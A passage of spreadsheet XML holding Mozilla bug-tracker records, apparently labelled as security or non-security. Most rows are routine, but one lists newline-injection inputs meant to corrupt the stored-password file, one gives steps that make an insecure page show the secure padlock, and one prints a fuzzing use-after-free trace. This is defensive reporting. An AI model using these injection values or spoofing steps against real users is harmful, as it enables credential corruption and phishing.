      <c r="R624" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S624" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T624" t="n">
        <v>1</v>
      </c>
      <c r="U624" t="n">
        <v>0</v>
      </c>
      <c r="V624" t="n">
        <v>4</v>
      </c>
      <c r="W624" t="inlineStr">
        <is>
          <t>M18 for FreeBSD is not gziped even though the file name
mozilla-i386-unknown-freebsdelf4.0-M18.tar.gz indicates that it is.  If tar is
used with the -xvzf options gzip reports that the file is not in gzip format.
The file can be successfully unpacked using tar -xvf.</t>
        </is>
      </c>
      <c r="X624" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="625">
      <c r="A625" t="n">
        <v>394610</v>
      </c>
      <c r="B625" t="inlineStr">
        <is>
          <t>2007-09-01 19:07:03 -0700</t>
        </is>
      </c>
      <c r="C625" t="inlineStr">
        <is>
          <t>Content can corrupt stored passwords by injecting line breaks</t>
        </is>
      </c>
      <c r="D625" t="inlineStr">
        <is>
          <t>2009-01-06 12:54:25 -0800</t>
        </is>
      </c>
      <c r="E625" t="n">
        <v>1</v>
      </c>
      <c r="F625" t="n">
        <v>1</v>
      </c>
      <c r="G625" t="n">
        <v>3</v>
      </c>
      <c r="H625" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I625" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J625" t="inlineStr">
        <is>
          <t>Password Manager</t>
        </is>
      </c>
      <c r="K625" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L625" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M625" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N625" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O625" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P625" t="inlineStr">
        <is>
          <t>[sg:moderate?]</t>
        </is>
      </c>
      <c r="Q625" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R625" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S625" t="inlineStr">
        <is>
          <t>mozilla1.9beta3</t>
        </is>
      </c>
      <c r="T625" t="n">
        <v>1</v>
      </c>
      <c r="U625" t="n">
        <v>0</v>
      </c>
      <c r="V625" t="n">
        <v>33</v>
      </c>
      <c r="W625" t="inlineStr">
        <is>
          <t>This is a potential issue raised at last week's pwmgr security/design review.
The current storage file, signons2.txt, is a line-based text file with an expected structure. If newlines were to be injected into the file, following entries would be shifted by one or more lines from where expected.
If this is possible, I think the only serious impact is that saving a login at an evil site would corrupt the file, and make existing logins inaccessible. I've thought about how entries shifted up/down by one or more lines would be handled, and tricking the pwmgr into disclosing a username or password shouldn't be possible. It might be possible to inject an extra, valid (not-corrupt) login with this technique... The username and password would already be known to the malicious site, though, so I'm not sure if that's useful for anything. [The injected entry would have to a base64 encoded user/pass]
The following things might be avenues for funky input:
* HTML name/id attribute on the input fields for a username and password
* The HTTP realm for WWW-Authenticate (equivalents for other protocols?)
* Site address? We ignore the URL Path, but maybe "evil\n.site.com" would work? [Also http://us\ner:pa\nss@site.com/ ?]
* The form submit URL. Handled the same as the site address, but because it doesn't actually have to work (and comes more or less directly from content),more bizarre values might be possible]
The actual username and password values are encrypted and stored as base64 encoded values, so it's unlikely bizarre values will do anything.</t>
        </is>
      </c>
      <c r="X625" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="626">
      <c r="A626" t="n">
        <v>271194</v>
      </c>
      <c r="B626" t="inlineStr">
        <is>
          <t>2004-11-22 01:32:29 -0800</t>
        </is>
      </c>
      <c r="C626" t="inlineStr">
        <is>
          <t>When going from a secure to a non-secure page without clicking a button in the security dialog, the non-secure page appears as secure</t>
        </is>
      </c>
      <c r="D626" t="inlineStr">
        <is>
          <t>2013-02-23 10:53:15 -0800</t>
        </is>
      </c>
      <c r="E626" t="n">
        <v>1</v>
      </c>
      <c r="F626" t="n">
        <v>1</v>
      </c>
      <c r="G626" t="n">
        <v>3</v>
      </c>
      <c r="H626" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I626" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J626" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K626" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L626" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M626" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N626" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O626" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P626" t="inlineStr">
        <is>
          <t>[sg:spoof]</t>
        </is>
      </c>
      <c r="Q626" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R626" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S626" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T626" t="n">
        <v>1</v>
      </c>
      <c r="U626" t="n">
        <v>0</v>
      </c>
      <c r="V626" t="n">
        <v>50</v>
      </c>
      <c r="W626" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
First of all, for reproducability, you must have it set so that links from other
applications open in the same window /and/ the same tab, and you must have the
dialog boxes that tell you when you go between secure and non-secure pages
turned on.
I went to http://gmail.com and then switched windows back to IRC and clicked on
a link in chat (http://www.mslinux.com) and then switched back to Firefox. 
After the page had loaded, I clicked okay on the dialog box.  Upon doing this,
the address bar went yellow/gold and the padlock appeared in the corner, even
though the page was not secure.  At Jesse Ruderman's recommendation, I am going
to classify this as a security bug.
I have reproduced 5 times, just to confirm that it happens every time.  I will
attach a screenshot.
I see a possibility that this could be used to spoof a secure site, when it is
not, and garner passwords, ect.  Although I am not sure exactly how that would
be pulled off.
Reproducible: Always
Steps to Reproduce:
1. Make sure you meet the requirements to reproduce I noted above
2. Goto http://gmail.com and make sure not to click anything on the security dialog
3. Switch windows to something else
4. Click a link in the secondary app
5. Switch back to Firefox
6. Click okay on the dialog
Actual Results:  
The address bar goes yellow/gold and the padlock appears in the lower left
corner as if the site were secure using https.
Expected Results:  
Regardless of which button on the dialog the user pushes, it should detect that
it's no longer on a secure site (https) and forego making the changes in
appearance that would indicate security.</t>
        </is>
      </c>
      <c r="X626" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="627">
      <c r="A627" t="n">
        <v>673136</v>
      </c>
      <c r="B627" t="inlineStr">
        <is>
          <t>2011-07-21 09:21:17 -0700</t>
        </is>
      </c>
      <c r="C627" t="inlineStr">
        <is>
          <t>adjust mobile tinderbox-builds cleanup to be the same as firefox's</t>
        </is>
      </c>
      <c r="D627" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E627" t="n">
        <v>1</v>
      </c>
      <c r="F627" t="n">
        <v>1</v>
      </c>
      <c r="G627" t="n">
        <v>5</v>
      </c>
      <c r="H627" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I627" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J627" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K627" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L627" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M627" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N627" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O627" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P627" t="inlineStr"/>
      <c r="Q627" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R627" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S627" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T627" t="n">
        <v>1</v>
      </c>
      <c r="U627" t="n">
        <v>0</v>
      </c>
      <c r="V627" t="n">
        <v>5</v>
      </c>
      <c r="W627" t="inlineStr">
        <is>
          <t>Currently it looks like we're cleaning anything older than a day.
I would have done this myself, but it looks like this cleanup isn't happening in ffxbld's crontab, and I don't know where to look.</t>
        </is>
      </c>
      <c r="X627" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="628">
      <c r="A628" t="n">
        <v>1349841</v>
      </c>
      <c r="B628" t="inlineStr">
        <is>
          <t>2017-03-22 21:53:44 -0700</t>
        </is>
      </c>
      <c r="C628" t="inlineStr">
        <is>
          <t>Don't show "Never For This Session" option in web notification permission prompts in PBM</t>
        </is>
      </c>
      <c r="D628" t="inlineStr">
        <is>
          <t>2017-03-29 05:56:40 -0700</t>
        </is>
      </c>
      <c r="E628" t="n">
        <v>1</v>
      </c>
      <c r="F628" t="n">
        <v>1</v>
      </c>
      <c r="G628" t="n">
        <v>2</v>
      </c>
      <c r="H628" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I628" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J628" t="inlineStr">
        <is>
          <t>Site Identity</t>
        </is>
      </c>
      <c r="K628" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L628" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M628" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N628" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O628" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P628" t="inlineStr">
        <is>
          <t>[fxprivacy]</t>
        </is>
      </c>
      <c r="Q628" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R628" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S628" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T628" t="n">
        <v>1</v>
      </c>
      <c r="U628" t="n">
        <v>0</v>
      </c>
      <c r="V628" t="n">
        <v>8</v>
      </c>
      <c r="W628" t="inlineStr">
        <is>
          <t>Bug 1341742 added a dropdown for the secondary action of web notification permission prompts, with a "Never" option ("Never For This Session" in private browsing mode). We shouldn't show this in private browsing mode.</t>
        </is>
      </c>
      <c r="X628" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="629">
      <c r="A629" t="n">
        <v>1539125</v>
      </c>
      <c r="B629" t="inlineStr">
        <is>
          <t>2019-03-26 05:19:23 -0700</t>
        </is>
      </c>
      <c r="C629" t="inlineStr">
        <is>
          <t>heap-use-after-free in AssertWorkerThread</t>
        </is>
      </c>
      <c r="D629" t="inlineStr">
        <is>
          <t>2024-05-30 09:57:45 -0700</t>
        </is>
      </c>
      <c r="E629" t="n">
        <v>1</v>
      </c>
      <c r="F629" t="n">
        <v>1</v>
      </c>
      <c r="G629" t="n">
        <v>3</v>
      </c>
      <c r="H629" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I629" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J629" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K629" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L629" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M629" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N629" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O629" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P629" t="inlineStr">
        <is>
          <t>[fixed by bug 1514733][adv-main67+]</t>
        </is>
      </c>
      <c r="Q629" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R629" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S629" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T629" t="n">
        <v>1</v>
      </c>
      <c r="U629" t="n">
        <v>0</v>
      </c>
      <c r="V629" t="n">
        <v>5</v>
      </c>
      <c r="W629" t="inlineStr">
        <is>
          <t>ASAN crashes with the following signature occur regularly when fuzzing the latest ASAN build of Firefox 68.0a1 . Unfortunatley I havent been able to minimize or reproduce a crash (likely a race condition).
=================================================================
==18599==ERROR: AddressSanitizer: heap-use-after-free on address 0x617000253520 at pc 0x7f8fe74af846 bp 0x7f8f86aa9cb0 sp 0x7f8f86aa9ca8
READ of size 8 at 0x617000253520 thread T41 (IPDL Background)
    #0 0x7f8fe74af845 in AssertWorkerThread /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:542:5
    #1 0x7f8fe74af845 in mozilla::ipc::MessageChannel::CxxStackFrame::CxxStackFrame(mozilla::ipc::MessageChannel&amp;, mozilla::ipc::Direction, IPC::Message const*) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:225
    #2 0x7f8fe74ae3ee in mozilla::ipc::MessageChannel::Send(IPC::Message*) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:980:17
    #3 0x7f8fe7f17c99 in mozilla::dom::PRemoteWorkerParent::SendExecOp(mozilla::dom::RemoteWorkerOp const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PRemoteWorkerParent.cpp:87:40
    #4 0x7f8feff50537 in mozilla::dom::RemoteWorkerController::Shutdown() /builds/worker/workspace/build/src/dom/workers/remoteworkers/RemoteWorkerController.cpp:163:23
    #5 0x7f8feff7051d in Terminate /builds/worker/workspace/build/src/dom/workers/sharedworkers/SharedWorkerManager.cpp:147:28
    #6 0x7f8feff7051d in operator() /builds/worker/workspace/build/src/dom/workers/sharedworkers/SharedWorkerManager.cpp:265
    #7 0x7f8feff7051d in mozilla::detail::RunnableFunction&lt;mozilla::dom::SharedWorkerManager::UnregisterHolder(mozilla::dom::SharedWorkerManagerHolder*)::$_0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:562
    #8 0x7f8fe61f7511 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
    #9 0x7f8fe61ff91d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:482:10
    #10 0x7f8fe74cda14 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:333:5
    #11 0x7f8fe73a1dbe in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #12 0x7f8fe73a1dbe in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #13 0x7f8fe73a1dbe in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #14 0x7f8fe61ef733 in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:454:11
    #15 0x7f900b1ac5ad in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #16 0x7f900adef6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #17 0x7f9009dcd88e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)
0x617000253520 is located 288 bytes inside of 728-byte region [0x617000253400,0x6170002536d8)
freed by thread T0 here:
    #0 0x55788cd4f9e2 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7f8fe74d57d0 in operator() /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/UniquePtr.h:486:5
    #2 0x7f8fe74d57d0 in reset /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/UniquePtr.h:323
    #3 0x7f8fe74d57d0 in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/UniquePtr.h:296
    #4 0x7f8fe74d57d0 in mozilla::ipc::IToplevelProtocol::~IToplevelProtocol() /builds/worker/workspace/build/src/ipc/glue/ProtocolUtils.cpp:567
    #5 0x7f8fe748199f in ~ParentImpl /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:239:3
    #6 0x7f8fe748199f in (anonymous namespace)::ParentImpl::~ParentImpl() /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:235
    #7 0x7f8fe7481d8b in applyImpl&lt;(anonymous namespace)::ParentImpl, void ((anonymous namespace)::ParentImpl::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1122:12
    #8 0x7f8fe7481d8b in apply&lt;(anonymous namespace)::ParentImpl, void ((anonymous namespace)::ParentImpl::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1128
    #9 0x7f8fe7481d8b in mozilla::detail::RunnableMethodImpl&lt;(anonymous namespace)::ParentImpl*, void ((anonymous namespace)::ParentImpl::*)(), false, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1174
    #10 0x7f8fe61f7511 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
    #11 0x7f8fe61ff91d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:482:10
    #12 0x7f8fe74cc04f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #13 0x7f8fe73a1dbe in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #14 0x7f8fe73a1dbe in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #15 0x7f8fe73a1dbe in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #16 0x7f8ff0846563 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #17 0x7f8ff4b2f120 in nsAppStartup::Run() /builds/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:271:30
    #18 0x7f8ff4e2cb0a in XREMain::XRE_mainRun() /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4589:22
    #19 0x7f8ff4e2f538 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4727:8
    #20 0x7f8ff4e30dc9 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4811:21
    #21 0x55788cd8264c in do_main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:212:22
    #22 0x55788cd8264c in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:291
    #23 0x7f9009ccdb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
previously allocated by thread T0 here:
    #0 0x55788cd4fd63 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x55788cd845fd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:68:15
    #2 0x7f8fe74d536f in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:131:10
    #3 0x7f8fe74d536f in MakeUnique&lt;mozilla::ipc::IToplevelProtocol::ToplevelState, const char *&amp;, mozilla::ipc::IToplevelProtocol *, mozilla::ipc::Side &amp;&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/UniquePtr.h:617
    #4 0x7f8fe74d536f in mozilla::ipc::IToplevelProtocol::IToplevelProtocol(char const*, IPCMessageStart, mozilla::ipc::Side) /builds/worker/workspace/build/src/ipc/glue/ProtocolUtils.cpp:561
    #5 0x7f8fe8292ce7 in mozilla::ipc::PBackgroundParent::PBackgroundParent() /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundParent.cpp:335:5
    #6 0x7f8fe7433278 in mozilla::ipc::BackgroundParentImpl::BackgroundParentImpl() /builds/worker/workspace/build/src/ipc/glue/BackgroundParentImpl.cpp:120:23
    #7 0x7f8fe743a150 in ParentImpl /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:226:12
    #8 0x7f8fe743a150 in Alloc /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:827
    #9 0x7f8fe743a150 in mozilla::ipc::BackgroundParent::Alloc(mozilla::dom::ContentParent*, mozilla::ipc::Endpoint&lt;mozilla::ipc::PBackgroundParent&gt;&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:640
    #10 0x7f8fefd60888 in mozilla::dom::ContentParent::RecvInitBackground(mozilla::ipc::Endpoint&lt;mozilla::ipc::PBackgroundParent&gt;&amp;&amp;) /builds/worker/workspace/build/src/dom/ipc/ContentParent.cpp:3169:8
    #11 0x7f8fe786eaea in mozilla::dom::PContentParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentParent.cpp:4356:57
    #12 0x7f8fe74c2c49 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2151:21
    #13 0x7f8fe74be98a in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2078:9
    #14 0x7f8fe74c0bc7 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1937:3
    #15 0x7f8fe74c1957 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1968:13
    #16 0x7f8fe61f7511 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
    #17 0x7f8fe61ff91d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:482:10
    #18 0x7f8fe61f4e0e in SpinEventLoopUntil&lt;mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:881:22)&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:348:25
    #19 0x7f8fe61f4e0e in nsThread::Shutdown() /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:881
    #20 0x7f8ff462bd69 in LoadLoadableRootsTask::Run() /builds/worker/workspace/build/src/security/manager/ssl/nsNSSComponent.cpp:644:16
    #21 0x7f8fe61f7511 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
    #22 0x7f8fe61ff91d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:482:10
    #23 0x7f8fe74cc04f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #24 0x7f8fe73a1dbe in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #25 0x7f8fe73a1dbe in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #26 0x7f8fe73a1dbe in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #27 0x7f8ff0846563 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #28 0x7f8ff4b2f120 in nsAppStartup::Run() /builds/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:271:30
    #29 0x7f8ff4e2cb0a in XREMain::XRE_mainRun() /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4589:22
    #30 0x7f8ff4e2f538 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4727:8
    #31 0x7f8ff4e30dc9 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4811:21
    #32 0x55788cd8264c in do_main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:212:22
    #33 0x55788cd8264c in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:291
    #34 0x7f9009ccdb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Thread T41 (IPDL Background) created by T0 here:
    #0 0x55788cd3867d in pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:210:3
    #1 0x7f900b19e613 in _PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:433:14
    #2 0x7f900b18809e in PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:518:12
    #3 0x7f8fe61f26a9 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:661:8
    #4 0x7f8fe61fe5d5 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:416:12
    #5 0x7f8fe6203684 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:135:57
    #6 0x7f8fe747df22 in NS_NewNamedThread&lt;16&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:71:10
    #7 0x7f8fe747df22 in (anonymous namespace)::ParentImpl::CreateBackgroundThread() /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:944
    #8 0x7f8fe74845ca in RunOnMainThread /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:1244:30
    #9 0x7f8fe74845ca in (anonymous namespace)::ParentImpl::CreateActorHelper::Run() /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:1263
    #10 0x7f8fe61f7511 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
    #11 0x7f8fe61ff91d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:482:10
    #12 0x7f8fe61f4e0e in SpinEventLoopUntil&lt;mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:881:22)&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:348:25
    #13 0x7f8fe61f4e0e in nsThread::Shutdown() /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:881
    #14 0x7f8fe8579d0b in applyImpl&lt;nsIThread, nsresult (nsIThread::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1122:12
    #15 0x7f8fe8579d0b in apply&lt;nsIThread, nsresult (nsIThread::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1128
    #16 0x7f8fe8579d0b in mozilla::detail::RunnableMethodImpl&lt;RefPtr&lt;nsIThread&gt;, nsresult (nsIThread::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1174
    #17 0x7f8fe61f7511 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
    #18 0x7f8fe61ff91d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:482:10
    #19 0x7f8fe61feed1 in SpinEventLoopUntil&lt;mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:489:36)&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:348:25
    #20 0x7f8fe61feed1 in nsThreadManager::SpinEventLoopUntilInternal(nsINestedEventLoopCondition*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:489
    #21 0x7f8fe622e891 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:106
    #22 0x7f8fe8673d57 in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1630:10
